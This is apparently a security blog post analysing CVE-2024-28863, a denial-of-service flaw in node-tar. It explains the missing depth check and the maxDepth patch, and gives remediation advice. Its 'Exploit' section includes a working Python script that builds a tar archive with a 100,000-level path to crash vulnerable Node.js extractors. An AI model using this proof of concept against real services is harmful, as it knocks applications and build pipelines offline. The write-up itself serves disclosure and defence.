
The Infinite Hallway: Crashing Node.js with CVE-2024-28863

Alon Barad
Software Engineer

Jan 29, 2026 · 6 min read

Executive Summary (TL;DR)

If you let users upload tarballs, they can kill your server by nesting folders 200,000 levels deep. `node-tar` < 6.2.1 didn't check how deep the rabbit hole went, leading to instant memory exhaustion.

A high-impact Denial of Service (DoS) vulnerability in the ubiquitous `node-tar` library allows attackers to crash Node.js applications by supplying a tar archive with excessively deep directory structures. By exploiting the lack of depth validation, a malicious archive forces the parser to allocate massive arrays and iterate continuously, triggering an Out of Memory (OOM) crash or CPU exhaustion.

The Hook: Parsing Until You Die

In the world of software dependencies, node-tar is like the plumbing in your walls: you never think about it until it bursts and floods your basement with sewage. It is the de-facto library for handling tar archives in the Node.js ecosystem, used by npm itself, thousands of build tools, and likely that file upload service you deployed last Friday.

Most developers worry about malicious files trying to write outside the target directory (the classic 'Zip Slip' vulnerability). We spend hours sanitizing ../ from paths to stop attackers from overwriting /etc/passwd. But CVE-2024-28863 asks a different, more philosophical question: What happens if we just go down? Like, really, really far down?

This vulnerability is a classic resource exhaustion attack. It doesn't require complex memory corruption or ROP chains. It simply abuses the parser's optimism. The library assumed that no sane human would ever create a directory structure nested 50,000 levels deep. Unfortunately for node-tar, hackers are not sane humans.

The Flaw: Recursion is a Hell of a Drug

The root cause lies in lib/unpack.js, specifically within the [CHECKPATH] method. This function is responsible for ensuring that the directory structure exists before writing a file to disk. If you give it a path like a/b/c/file.txt, it politely ensures a, a/b, and a/b/c exist.

The logic involved taking the entry's path, normalizing it (fixing slashes), and then splitting it into an array of path segments. This sounds innocent enough in a Computer Science 101 class. But in V8 (the JavaScript engine powering Node.js), everything has a cost.

Here is the logic flaw: there was absolutely no check on the length of that array. An attacker can craft a tar header claiming a file is located at a/a/a/a/...[repeat 100k times].../file.txt. When node-tar receives this:

  1. It allocates a massive string for the path.
  2. It splits that massive string into a massive array.
  3. It tries to iterate over that massive array to check filesystem existence for every single segment.

This triggers a 'Death by 1000 Cuts' scenario. The string manipulation alone spikes memory usage. The loop hangs the Event Loop (blocking the single thread Node.js relies on). Eventually, the V8 garbage collector panics, waves a white flag, and the process crashes with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory.
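The scale of that work is easy to feel with a quick sketch (Python here, purely to illustrate the cost the parser pays before it touches the filesystem):

```python
import sys

# Recreate the attacker-controlled path: a tiny tar header field expands
# into a ~200 KB string and a ~100,000-element array inside the parser.
deep_path = "a/" * 100_000 + "payload.txt"
parts = deep_path.split("/")

print(len(deep_path))        # 200011 characters in one string
print(len(parts))            # 100001 segments to iterate over
print(sys.getsizeof(parts))  # the list's pointer storage alone is hundreds of KB
```

And that is just one entry; an archive can contain thousands of them.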

The Code: The Smoking Gun

Let's look at the fix to understand the breakage. The patch is remarkably simple, which highlights just how basic the oversight was. The maintainers introduced a maxDepth governor to the unpacking logic.

Here is the relevant diff from commit fe8cd57da5686f8695415414bda49206a545f7f7:

// The Band-Aid
const DEFAULT_MAX_DEPTH = 1024
 
// Inside the Unpack class
this.maxDepth = typeof opt.maxDepth === 'number'
  ? opt.maxDepth
  : DEFAULT_MAX_DEPTH
 
// The Check
[CHECKPATH] (entry) {
  const p = normPath(entry.path)
  const parts = p.split('/')
  
  // The new safety valve
  if (isFinite(this.maxDepth) && parts.length > this.maxDepth) {
    this.warn('TAR_ENTRY_ERROR', 'path excessively deep', {
      entry,
      path: p,
      depth: parts.length,
      maxDepth: this.maxDepth,
    })
    return false // Abort!
  }
  // ... rest of the logic
}

Before this patch, parts could be arbitrarily large. The fix simply says, "If you are nesting folders more than 1024 deep, you are doing something wrong, and we are not participating."

> [!NOTE]
> **Researcher Insight:** While this limits the logic depth, the code still calls `normPath(entry.path)` and `p.split('/')` before the check. A theoretical attacker could still cause memory pressure by sending a path string so long that just splitting it exhausts memory, even if the depth check immediately fails afterwards. However, this is much harder to exploit than the recursion loop.
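The guard itself is trivially portable. Here is a rough Python transliteration (the function and constant names are mine, not node-tar's), handy if you want to pre-validate paths in your own code:

```python
DEFAULT_MAX_DEPTH = 1024  # mirrors node-tar's default governor

def depth_ok(path: str, max_depth: int = DEFAULT_MAX_DEPTH) -> bool:
    """Return False if the entry's path nests more deeply than max_depth."""
    # Note: like the patched [CHECKPATH], this still splits the full string
    # before checking, so a pathological path still costs some memory.
    parts = path.split("/")
    return len(parts) <= max_depth

print(depth_ok("a/b/c/file.txt"))          # True
print(depth_ok("a/" * 2000 + "file.txt"))  # False
```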

The Exploit: Building the Tower of Babel

You can't just open your terminal and type mkdir -p a/b/c... to create a Proof of Concept. Your Operating System (Linux, Windows, macOS) has limits on path lengths (usually 4096 bytes or MAX_PATH on Windows). If you try to create this structure on your disk to zip it up, your OS will stop you.

But here's the secret: The Tar format doesn't care about your OS limits.

We can bypass the OS entirely by constructing the Tar archive programmatically using Python. We generate the headers directly, lying to the tar structure about the existence of these folders. We don't need them to exist on our disk; we just need to tell node-tar they exist.

Here is how a researcher builds the weapon:

import tarfile
import io
 
# Build a path ~200,000 characters long: 100,000 directory
# levels of "a/" followed by the file name
deep_path = "a/" * 100000 + "payload.txt"
 
with tarfile.open("death_by_depth.tar", "w") as tar:
    # Create a dummy file in memory
    data = b"pwned"
    info = tarfile.TarInfo(name=deep_path)
    info.size = len(data)
    
    # Add it to the archive
    tar.addfile(info, io.BytesIO(data))
 
print("Archive created. Don't try to extract this manually.")
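You can sanity-check what the archive claims without extracting it; listing members is safe because nothing touches the filesystem. This sketch builds the same malicious archive in memory and lists it:

```python
import io
import tarfile

# Build the malicious archive entirely in memory
deep_path = "a/" * 100000 + "payload.txt"
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    info = tarfile.TarInfo(name=deep_path)
    info.size = 5
    tar.addfile(info, io.BytesIO(b"pwned"))

# Listing is harmless: no directories are created
buf.seek(0)
with tarfile.open(fileobj=buf) as tar:
    for member in tar:
        print(member.name.count("/"), "levels deep,", member.size, "bytes")
```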

When this file is fed to a vulnerable node-tar instance:

  1. The stream parser reads the header.
  2. It sees the path.
  3. It attempts to validate the directory structure.
  4. BOOM. The Node.js process is killed by the operating system's OOM killer or aborts with a V8 heap-limit fatal error.

The Impact: Why Availability Matters

DoS vulnerabilities often get a bad rap as being "boring" compared to RCE. But in a modern cloud environment, DoS is expensive.

Imagine a CI/CD pipeline that accepts user code repositories. If an attacker commits a death_by_depth.tar and your build server tries to unpack it using npm install (which uses node-tar), your build agent dies.

If you have auto-scaling enabled, your infrastructure might see the crash, assume the node is unhealthy, spin up a new one, and retry the job. The attacker has just created an infinite loop of crashing servers, burning through your cloud budget with a single tiny archive.

Furthermore, because Node.js is single-threaded, this isn't just a memory crash. While node-tar is churning through that array of 100,000 elements, the Event Loop is blocked. No other requests are being handled. Health checks fail. The application becomes unresponsive instantly, even before the crash happens.

The Fix: Stopping the Bleeding

The remediation is straightforward, but it requires vigilance.

1. Upgrade immediately. Ensure node-tar is at version 6.2.1 or higher. Because node-tar is usually a transitive dependency, run npm audit fix or manually inspect your package-lock.json to ensure no vulnerable versions linger in your tree.

2. Configuration Defense. If you are using node-tar programmatically, you can now enforce your own sanity limits. If you know your application only handles shallow archives, set the limit even lower:

tar.x({
  file: 'upload.tar',
  maxDepth: 10 // Be strict if you can
})

3. Validate before you Unpack. Never trust user input. If possible, inspect the file listing of an archive before extracting it. If you see a file path length that looks like a novel, reject it before passing it to the extractor.
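As a sketch of that pre-flight check (the `safe_members` name and the limit of 32 are my own illustrative choices, not a standard), Python's tarfile module can screen entries before extraction:

```python
import tarfile

MAX_DEPTH = 32  # hypothetical policy for shallow upload archives

def safe_members(tar, max_depth=MAX_DEPTH):
    """Yield only members with sane paths; silently skip the rest."""
    for member in tar:
        parts = member.name.split("/")
        if member.name.startswith("/") or ".." in parts or len(parts) > max_depth:
            continue  # absolute path, traversal, or excessive depth
        yield member

# Usage: extract only the vetted entries
# with tarfile.open("upload.tar") as tar:
#     tar.extractall("dest", members=safe_members(tar))
```

The same screening idea applies whatever extractor you use: walk the listing first, reject anything absurd, and only then let the real unpacker run.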


Technical Appendix

CVSS Score: 6.5 / 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS Probability: 0.45% (top 37% most exploited)

Affected Systems

- node-tar < 6.2.1
- npm CLI (indirectly)
- node-gyp (indirectly)
- Any Node.js application extracting untrusted tarballs

Affected Versions Detail

Product: node-tar (isaacs)
Affected Versions: < 6.2.1
Fixed Version: 6.2.1

CWE: CWE-400 (Uncontrolled Resource Consumption)
Attack Vector: Network (Malicious Archive)
CVSS: 6.5 (Medium)
Impact: Denial of Service (App Crash)
Fix Commit: fe8cd57da5686f8695415414bda49206a545f7f7
EPSS Score: 0.45% (Moderate)

CWE-400: Uncontrolled Resource Consumption

The software does not properly restrict the size or amount of resources that are requested or influenced by an actor, which can be used to consume more resources than intended.

Vulnerability Timeline

2024-03-12: Vulnerability discovered and reported
2024-03-16: Patch committed to node-tar repository
2024-03-21: CVE published and advisory released
